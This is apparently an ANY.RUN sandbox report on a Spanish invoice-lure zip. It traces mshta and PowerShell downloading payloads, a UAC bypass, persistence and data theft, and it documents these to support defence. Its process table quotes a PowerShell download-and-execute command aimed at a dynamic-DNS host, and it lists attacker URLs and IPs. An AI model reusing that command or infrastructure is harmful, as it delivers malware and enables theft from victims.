File name:

Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip

Full analysis: https://app.any.run/tasks/1b13e083-3c7b-45d0-affb-66599dd5f9f3
Verdict: Malicious activity
Analysis date: May 10, 2024, 19:51:33
OS: Windows 11 Professional (build: 22000, 64 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

54DA5A3E184E598FD9A330281BDBD47C

SHA1:

D5E8327B838344B5BD752A0ABF9C2BCDE4F57AE0

SHA256:

04F8A053EF21E894A1E5CDC1A0B37C393D0C104F89CB3ED9EE43755B7F03E287

SSDEEP:

48:9y8qkFAvMvmTnquDBd3qhTgapVTtbioErc31y9Sw6P4a8i5:55FAvMeTqgBd3qhTga3Yc31+Sw6SA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 7048)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)

    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6756)

    • Create files in the Startup directory

      • powershell.exe (PID: 6756)

    • Bypass User Account Control (DelegateExecute)

      • powershell.exe (PID: 6756)

    • Actions looks like stealing of personal data

      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)

  • SUSPICIOUS

    • Reads the Internet Settings

      • OpenWith.exe (PID: 2488)
      • OpenWith.exe (PID: 6740)
      • mshta.exe (PID: 7048)
      • powershell.exe (PID: 6756)
      • PickerHost.exe (PID: 3728)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1352)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)

    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 7048)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 7048)

    • Executing commands from ".cmd" file

      • mshta.exe (PID: 7048)

    • Potential Corporate Privacy Violation

      • chrome.exe (PID: 1588)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 7048)
      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)

    • Checks whether a specific file exists (SCRIPT)

      • mshta.exe (PID: 7048)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 5196)

    • Application launched itself

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 536)
      • powershell.exe (PID: 5464)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)

    • Unusual connection from system programs

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6756)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6756)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 6756)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 6756)

    • Changes default file association

      • powershell.exe (PID: 6756)

    • The process creates files with name similar to system file names

      • powershell.exe (PID: 6756)

    • The system shut down or reboot

      • powershell.exe (PID: 6756)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 7048)

    • Executes application which crashes

      • _tnuwpr9_Ni7.exe (PID: 1064)

    • Loads DLL from Mozilla Firefox

      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7876)

    • Reads settings of System Certificates

      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 536)

    • Checks Windows Trust Settings

      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7864)

  • INFO

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 2488)
      • WinRAR.exe (PID: 6080)
      • chrome.exe (PID: 6056)
      • OpenWith.exe (PID: 6740)
      • WinRAR.exe (PID: 1352)
      • firefox.exe (PID: 6348)

    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 2488)
      • OpenWith.exe (PID: 6740)
      • PickerHost.exe (PID: 3728)

    • The process uses the downloaded file

      • chrome.exe (PID: 6928)
      • chrome.exe (PID: 7156)
      • chrome.exe (PID: 6548)
      • chrome.exe (PID: 6656)
      • chrome.exe (PID: 7004)
      • OpenWith.exe (PID: 6740)
      • chrome.exe (PID: 6004)
      • chrome.exe (PID: 7064)
      • WinRAR.exe (PID: 1352)
      • chrome.exe (PID: 7124)
      • chrome.exe (PID: 6488)
      • chrome.exe (PID: 6576)

    • Application launched itself

      • chrome.exe (PID: 6056)
      • firefox.exe (PID: 6324)
      • firefox.exe (PID: 6348)

    • Checks proxy server information

      • mshta.exe (PID: 7048)
      • powershell.exe (PID: 6756)
      • WerFault.exe (PID: 988)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7940)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7048)

    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6756)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 536)
      • powershell.exe (PID: 5464)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6756)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6756)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 536)
      • powershell.exe (PID: 5464)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 6756)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6756)

    • Manual execution by a user

      • cmd.exe (PID: 5196)
      • _tnuwpr9_Ni7.exe (PID: 1064)
      • cmd.exe (PID: 5280)
      • firefox.exe (PID: 6324)

    • Checks supported languages

      • _tnuwpr9_Ni7.exe (PID: 1064)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)

    • Reads Environment values

      • _tnuwpr9_Ni7.exe (PID: 1064)

    • Reads the Internet Settings

      • WerFault.exe (PID: 988)

    • Reads the software policy settings

      • WerFault.exe (PID: 988)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 988)
      • pingsender.exe (PID: 7864)

    • Reads the machine GUID from the registry

      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)

    • Reads the computer name

      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2024:05:10 12:40:46
ZipCRC: 0x69c710d7
ZipCompressedSize: 1388
ZipUncompressedSize: 6774
ZipFileName: Se adjunta factura N? - O6v0V8F5D3Y2R2805.html
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
300
Monitored processes
85
Malicious processes
14
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs openwith.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs openwith.exe no specs winrar.exe no specs chrome.exe no specs chrome.exe no specs mshta.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe shutdown.exe no specs pickerhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe _tnuwpr9_ni7.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs werfault.exe cmd.exe no specs powershell.exe firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs pingsender.exe pingsender.exe conhost.exe no specs conhost.exe no specs pingsender.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
536powershell.exe -nop -win 1 -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
748"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6596 -childID 12 -isForBrowser -prefsHandle 6700 -prefMapHandle 6704 -prefsLen 28202 -prefMapSize 242999 -jsInitHandle 1344 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f9316a-a299-4436-b5c1-ba42ba3441e8} 6348 "\\.\pipe\gecko-crash-server-pipe.6348" 21d76bbb150 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
948C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('http://tyahw.3utilities.com/ldvb/pw') "C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
988C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 700C:\Windows\SysWOW64\WerFault.exe
_tnuwpr9_Ni7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.22000.653 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
1064"C:\_tnuwpr9_N\_tnuwpr9_Ni7.exe" C:\_tnuwpr9_N\_tnuwpr9_Ni7.exe
explorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
3221225477
Version:
8.0.920.14
Modules
Images
c:\_tnuwpr9_n\_tnuwpr9_ni7.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
1076"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6924 -childID 13 -isForBrowser -prefsHandle 6784 -prefMapHandle 5616 -prefsLen 28202 -prefMapSize 242999 -jsInitHandle 1344 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aa0bfb2-feca-4b58-816e-86d1d160e005} 6348 "\\.\pipe\gecko-crash-server-pipe.6348" 21d76bbb310 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
1352"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\Factura-ZRAKG.zip"C:\Program Files\WinRAR\WinRAR.exeOpenWith.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
1073807364
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1420"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11249738196056524982,8773611683334439535,262144 --variations-seed-version --mojo-platform-channel-handle=3180 /prefetch:1C:\Program Files (x86)\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
123.0.6312.86
Modules
Images
c:\program files (x86)\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\google\chrome\application\123.0.6312.86\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1544"C:\Windows\System32\cmd.exe" /c C:\Users\Public\e.cmdC:\Windows\SysWOW64\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
1588"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --no-appcompat-clear --field-trial-handle=2100,i,11249738196056524982,8773611683334439535,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
123.0.6312.86
Modules
Images
c:\program files (x86)\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\google\chrome\application\123.0.6312.86\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
Total events
106 549
Read events
106 240
Write events
304
Delete events
5

Modification events

(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\General
Operation:writeName:VerInfo
Value:
005B0500FA5ED87E13A3DA01
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Downloads\Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6080) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
Operation:writeName:MSEdgeHTM
Value:
(PID) Process:(2488) OpenWith.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
Operation:writeName:MSEdgeHTM
Value:
Executable files
7
Suspicious files
365
Text files
100
Unknown types
33

Dropped files

PID
Process
Filename
Type
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-663E7AE6-17A8.pma
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF10e83f.TMP
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF10e83f.TMP
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\LOG.old
MD5:
SHA256:
6056chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
50
TCP/UDP connections
119
DNS requests
80
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1088
svchost.exe
POST
302
184.28.89.167:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
2868
OfficeClickToRun.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
1088
svchost.exe
POST
302
184.28.89.167:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
1088
svchost.exe
POST
302
184.28.89.167:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
1088
svchost.exe
POST
302
184.28.89.167:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
1588
chrome.exe
GET
200
34.104.35.123:80
http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
unknown
unknown
7048
mshta.exe
GET
200
93.127.215.82:80
http://tyahw.3utilities.com/ldvb/0105
unknown
unknown
6756
powershell.exe
GET
200
93.127.215.82:80
http://tyahw.3utilities.com/ldvb/pw
unknown
unknown
6756
powershell.exe
GET
200
51.20.73.61:80
http://51.20.73.61/m5.zip
unknown
unknown
2828
svchost.exe
GET
200
199.232.214.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?4d03a57f1cd14d0c
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
239.255.255.250:1900
unknown
2844
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2844
svchost.exe
20.42.73.31:443
v10.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
1088
svchost.exe
184.28.89.167:80
go.microsoft.com
AKAMAI-AS
US
unknown
2868
OfficeClickToRun.exe
20.42.72.131:443
self.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2868
OfficeClickToRun.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
66.102.1.84:443
accounts.google.com
GOOGLE
US
unknown
216.58.206.35:443
clientservices.googleapis.com
GOOGLE
US
unknown
142.250.181.238:443
clients2.google.com
GOOGLE
US
unknown

DNS requests

Domain
IP
Reputation
v10.events.data.microsoft.com
  • 20.42.73.31
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
self.events.data.microsoft.com
  • 20.42.72.131
  • 52.182.143.209
whitelisted
clientservices.googleapis.com
  • 216.58.206.35
whitelisted
accounts.google.com
  • 66.102.1.84
shared
clients2.google.com
  • 142.250.181.238
whitelisted
firebasestorage.googleapis.com
  • 216.58.206.74
  • 216.58.206.42
  • 172.217.18.10
  • 142.250.185.106
  • 142.250.186.170
  • 142.250.185.170
  • 142.250.186.106
  • 142.250.185.74
  • 142.250.74.202
  • 142.250.184.234
  • 142.250.185.202
  • 142.250.184.202
  • 142.250.185.234
  • 142.250.186.138
  • 172.217.16.202
  • 142.250.185.138
whitelisted
edgedl.me.gvt1.com
  • 34.104.35.123
whitelisted
www.google.com
  • 142.250.186.100
whitelisted
zacmn.tech
  • 38.54.45.29
unknown

Threats

PID
Process
Class
Message
Misc activity
ET INFO Microsoft Connection Test
1588
chrome.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1588
chrome.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1588
chrome.exe
Potential Corporate Privacy Violation
ET POLICY Dropbox.com Offsite File Backup in Use
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.3utilities .com
7048
mshta.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.3utilities .com Domain
7048
mshta.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
6756
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.3utilities .com Domain
6756
powershell.exe
Potentially Bad Traffic
ET HUNTING Terse Request for Zip File (GET)
6756
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
5 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip